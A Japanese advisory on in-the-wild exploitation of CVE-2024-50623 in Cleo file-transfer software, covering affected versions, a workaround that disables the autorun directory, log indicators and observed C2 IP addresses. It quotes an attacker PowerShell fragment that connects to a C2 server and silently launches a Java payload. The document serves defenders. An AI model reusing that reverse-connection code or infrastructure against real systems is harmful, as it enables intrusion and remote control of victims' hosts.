ファイル転送ソフトのCleoで重大な脆弱性が悪用される(CVE-2024-50623)

ファイル転送ソフトのCleoで重大な脆弱性が悪用される(CVE-2024-50623)

セキュリティ企業のHuntress Labsはファイル転送ソフトのCleo の Harmony、VLTrader、LexiCom ソフトウェアで重大な脆弱性 (CVE-2024-50623) が悪用されていると注意喚起しました。

脆弱性の対象バージョン

  • Cleo Harmony® (バージョン 5.8.0.21 未満)
  • Cleo VLTrader® (バージョン 5.8.0.21 未満)
  • Cleo LexiCom® (バージョン 5.8.0.21 未満)

パッチはリリース済みでバージョン 5.8.0.21以上

なお上記のパッチ を適用しても悪用される可能性がありますのでHuntress Labsは Cleoをファイアウォールの背後に移動することを強く勧めています。

緩和策

パッチを当てたバージョン 5.8.0.21 は、実際に発生しているエクスプロイトに対しては不十分です。Huntress LabsがCleoと会話したところ、できるだけ早く新しいパッチを提供すると述べています。

当面は、攻撃対象領域を制限するための緩和策を提案しました。この攻撃パスの後半は自動実行ディレクトリ経由のコード実行に依存していることから、

以下の手順の通りCleo を再構成してこの機能を無効にすることは可能です。ただし、パッチがリリースされるまでは、任意のファイル書き込みの脆弱性を防ぐことはできません。

  1. LexiCom、Harmony、またはVLTraderの「設定」メニューに移動します
  2. 「オプション」を選択 
  3. 「その他」パネルに移動します
  4. 「自動実行ディレクトリ」フィールドの内容を削除します

パッチリリースバージョン

サイバー攻撃者は Cleo の自動実行ディレクトリに悪意のあるファイルを埋め込み、ソフトウェアはそれを自動的に処理して実行後に​​削除します。

このメカニズムにより PowerShell コマンドの実行が容易になり、攻撃者は Webshel​​l のような永続性を持つ JAR ファイルなどの追加のペイロードを取得できるようになります。

攻撃兆候

以下のログがHuntressの観察から確認されています

自動実行ファイルの処理ログ

<Event> 
<Detail level="0">Note: Processing autorun file 'autorun\healthchecktemplate.txt'.</Detail> 
<Mark date="2024/12/07 05:56:55" EN="18734"></Mark> 
</Event>

PowerShellコマンドの使用

$c=New-Object Net.Sockets.TcpClient("176.123.5.126", 443)
$s=$c.GetStream()
Start-Process -WindowStyle Hidden -FilePath jre\bin\java.exe -ArgumentList "-jar $f"

攻撃者がCleoソフトウェアを使用してローカルファイルをインポートし、悪用後のログの記録

<Event> 
<Detail level="0">Note: Importing 'hosts\main.xml' (4.533 kBytes)...</Detail> 
<Mark date="2024/12/07 05:56:56" EN="18737"></Mark> 
</Event>

この攻撃には、Active Directory 列挙用の nltest.exe などの偵察ツールも組み込まれており、コマンド アンド コントロール (C2) を維持するために 176.123.5.126 や 5.149.249.226 などの外部 IP が使用されます。

攻撃に使用されたIPアドレス

  • 観測されたC2サーバーのIPアドレス:
    • 176.123.5.126(モルドバ)
    • 5.149.249.226(オランダ)
    • 185.181.230.103(モルドバ)
    • 209.127.12.38(カナダ)
    • 181.214.147.164(リトアニア)
    • 192.119.99.42(米国)

これらのIPはCleoシステムに接続して攻撃を行い、継続的な通信を確立するために使用されています。

TOPへ